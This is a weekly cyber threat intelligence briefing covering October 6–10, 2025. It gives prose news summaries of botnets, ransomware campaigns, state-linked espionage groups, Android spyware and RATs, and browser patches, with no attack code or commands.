Weekly Threat Briefing
Diamond Trail

Cyware Weekly Threat Intelligence, October 06–10, 2025

shutterstock 1922425763

Security teams are racing against RondoDox, a botnet that's blasting through 56 vulnerabilities across 30+ vendors to hijack routers, DVRs, NVRs, and web servers. Chinese hackers, likely state-linked, are hijacking the Nezha monitoring tool to deploy Gh0st RAT, compromising over 100 servers. Storm-1175 is tearing through GoAnywhere MFT with a devastating flaw to deploy Medusa ransomware. Attackers exploit this CVSS 10.0 deserialization bug for unauthenticated code execution, using tools like SimpleHelp to lock down networks swiftly.

Russian Android users are in the crosshairs of ClayRat, a slick spyware masquerading as WhatsApp, TikTok, or YouTube apps spread via Telegram and phishing lures, with over 600 samples detected in just three months. A cunning Python-based RAT is outsmarting defenses by rewriting its code on every run. This malware encrypts and executes from memory, sidestepping file scans, while injecting junk code and shuffling functions to create unique signatures. BatShadow is casting a net over job seekers with fake offers laced with Vampire Bot malware. Vietnamese hackers deliver ZIPs disguised as corporate docs, tricking victims into Edge-specific downloads.

The Good

  • The FBI, in collaboration with French law enforcement, has seized the BreachForums hacking forum, operated by the ShinyHunters group, which was used for leaking corporate data and extorting companies. This action comes as the group threatened to release data from Salesforce breaches unless ransoms were paid. The seizure includes all database backups since 2023, confirming that the gang's operations have been compromised. Despite this, their dark web data leak site remains active, with plans to expose sensitive information from major companies like FedEx, Disney, and Google. The ShinyHunters stated that they would not attempt to relaunch BreachForums, cautioning that such forums should now be viewed as traps for cybercriminals.

The Bad

  • The RondoDox botnet campaign has emerged as a significant threat, exploiting over 50 vulnerabilities across more than 30 vendors, including flaws first identified in Pwn2Own contests. This campaign targets internet-facing devices such as routers, DVRs, NVRs, and web servers, posing risks of data exfiltration and operational disruptions. Active exploitation has been observed globally since mid-2025, with several vulnerabilities listed in CISA’s KEV catalog. RondoDox employs a "shotgun" approach, utilizing command-injection flaws to gain shell access and deploy multi-architecture payloads. The botnet has evolved through a "loader-as-a-service" model, co-packaging its exploits with other malware, thus increasing its effectiveness and urgency in the cybersecurity landscape.

  • Hackers are now leveraging the Velociraptor DFIR tool in ransomware attacks, particularly with LockBit and Babuk variants. This activity is linked to a China-based group known as Storm-2603, which is associated with nation-state actors. The attackers exploit an outdated version of Velociraptor, vulnerable to a privilege escalation issue (CVE-2025-6264), allowing them to create local admin accounts and gain persistent access to compromised systems. Once inside, they utilize Velociraptor to maintain control and execute commands remotely. Additionally, they deploy PowerShell scripts for file exfiltration and encryption, employing techniques to evade detection.

  • Volexity has identified UTA0388, a China-aligned threat actor conducting sophisticated spear phishing campaigns since April, targeting organizations globally with a focus on Asian geopolitical issues, particularly Taiwan. Utilizing OpenAI's ChatGPT, UTA0388 crafts convincing phishing emails and develops a custom malware family known as GOVERSHELL, which has five distinct variants, each with evolving capabilities and communication methods. The phishing emails often exhibit incoherence, featuring fabricated personas and nonsensical details, indicative of LLM usage. The GOVERSHELL malware employs techniques like search order hijacking and scheduled tasks for persistence, while its infrastructure has shifted from direct-to-IP connections to more complex DNS-based domains.

  • Chinese hackers with suspected ties to the state have begun exploiting the open-source Nezha monitoring tool to deliver the Gh0st RAT. This campaign, identified by Huntress, utilizes log poisoning techniques to implant web shells on vulnerable servers, primarily targeting systems with exposed phpMyAdmin panels. The attackers have compromised over 100 machines globally, with significant infections reported in Taiwan, Japan, South Korea, and Hong Kong. By leveraging Nezha, the hackers execute commands and bypass antivirus protections, showcasing a concerning trend of using legitimate tools for malicious activities. The operation is characterized by its technical sophistication, as the threat actors manipulate SQL commands to drop PHP web shells, enabling further exploitation of the affected systems.

  • A critical vulnerability, CVE-2025-10035, in GoAnywhere MFT has been exploited by the Storm-1175 threat group, known for deploying Medusa ransomware. This deserialization flaw, with a CVSS score of 10.0, allows attackers to bypass signature verification and execute remote code on unpatched systems without requiring authentication. Storm-1175 employs a multi-stage attack that begins with exploiting the vulnerability, followed by establishing persistence using remote monitoring and management tools like SimpleHelp and MeshAgent. The group then conducts network discovery and lateral movement within compromised environments, ultimately leading to the deployment of Medusa ransomware. 

  • Mustang Panda, a sophisticated China-linked threat actor, has refined its cyber espionage tactics by employing an advanced DLL side-loading technique aimed at the Tibetan community. This politically motivated campaign begins with a deceptive .ZIP file disguised as an executable related to the Dalai Lama, concealing a malicious DLL that remains hidden from standard file exploration. The malware, known as Claimloader, establishes persistence through both Windows registry modifications and scheduled tasks, complicating detection and removal efforts. Once activated, it deploys a secondary payload called Publoader, which utilizes advanced obfuscation methods to exfiltrate data while communicating with C2 servers.

  • A recent malvertising campaign targeted WordPress websites by injecting malicious JavaScript into the theme’s functions.php file. This code fetched external scripts from attacker-controlled domains, resulting in forced redirects and pop-ups for unsuspecting visitors. The investigation revealed that the compromised function, ti_custom_javascript(), established a connection to a Command and Control server, allowing the attackers to deliver harmful payloads. The malicious script included techniques such as hidden iframes and mimicked legitimate Cloudflare actions to evade detection. 

New Threats

  • ClayRat is Android spyware targeting Russian users, spreading through Telegram and phishing sites while impersonating popular apps. The spyware collects sensitive data, takes photos, sends messages, and places calls from infected devices. ClayRat aggressively propagates by sending malicious links to all contacts in the victim's phone book. It uses advanced obfuscation techniques and session-based installation to bypass Android security measures. Abuse of the default SMS handler role allows ClayRat to access and manipulate SMS data without user consent.

  • A new Python-based RAT employs advanced polymorphic and self-modifying techniques, altering its code signature with each execution to evade detection. The RAT uses functions like self_modifying_wrapper(), decrypt_and_execute(), and polymorph_code() for on-the-fly mutation, leveraging Python’s introspection and serialization capabilities. The malware wraps critical code in a self-modifying layer, encrypts and decrypts code using XOR encryption, and executes it from memory, bypassing traditional file-based scanning. The polymorph_code() function introduces random junk code, renames variables, shuffles functions, and injects no-op routines to create unique file signatures for every execution. The RAT includes offensive features like network scanning, payload delivery, data theft, self-propagation, and bot command interaction via platforms like Discord and Slack.

  • The Vietnamese threat actor group BatShadow is conducting a new campaign targeting job seekers and digital marketing professionals using social engineering tactics to distribute a Go-based malware named "Vampire Bot." Malicious files disguised as job descriptions and corporate documents are delivered via ZIP archives containing decoy PDFs and harmful LNK or executable files. Victims are tricked into opening these files, triggering an infection chain involving PowerShell scripts to download additional payloads, including remote desktop software for persistent access. The attackers exploit browser-specific behaviors, instructing victims to use Microsoft Edge to bypass security restrictions and download malicious files.

  • Google has released Chrome version 141.0.7390.65/.66 to address three critical security vulnerabilities that could allow attackers to execute arbitrary code. These flaws include CVE-2025-11458, a high-severity heap buffer overflow in Chrome Sync and CVE-2025-11460, another high-severity issue involving a use-after-free error in the Storage component. Additionally, CVE-2025-11211 is a medium-severity out-of-bounds read in WebCodecs, reported by Jakob Košir. All three vulnerabilities require user interaction with specially crafted web content to be exploited, making them particularly dangerous. 

  • A new Android RAT, dubbed the "Most Powerful (FUD Android RAT) 2025," has emerged on GitHub, designed to evade antivirus detection and operate entirely through a web interface. This RAT allows attackers to manage compromised devices in real-time without needing a PC, utilizing advanced encryption methods to maintain secure communication. It features a wide array of malicious capabilities, including call recording, SMS interception, credential theft from banking apps, and live GPS tracking. Additionally, it can bypass restrictions on Chinese ROMs and remains persistent by consuming minimal resources.

  • New variants of the XWorm malware, specifically versions 6.0, 6.4, and 6.5, have re-emerged in phishing campaigns, featuring over 35 plugins that enhance its malicious capabilities, including ransomware functionalities. Initially observed in 2022, XWorm is a modular remote access trojan known for its ability to steal sensitive data, track keystrokes, and launch DDoS attacks. Following the abandonment of the project by its original developer, XCoder, various cybercriminals have begun distributing cracked versions. Its ransomware module encrypts files, appending a .ENC extension, while providing victims with ransom instructions, demonstrating a notable overlap with the NoCry ransomware’s encryption techniques.

XWormRondoDoxNezhaMedusa ransomwareStorm-1175

Discover Related Resources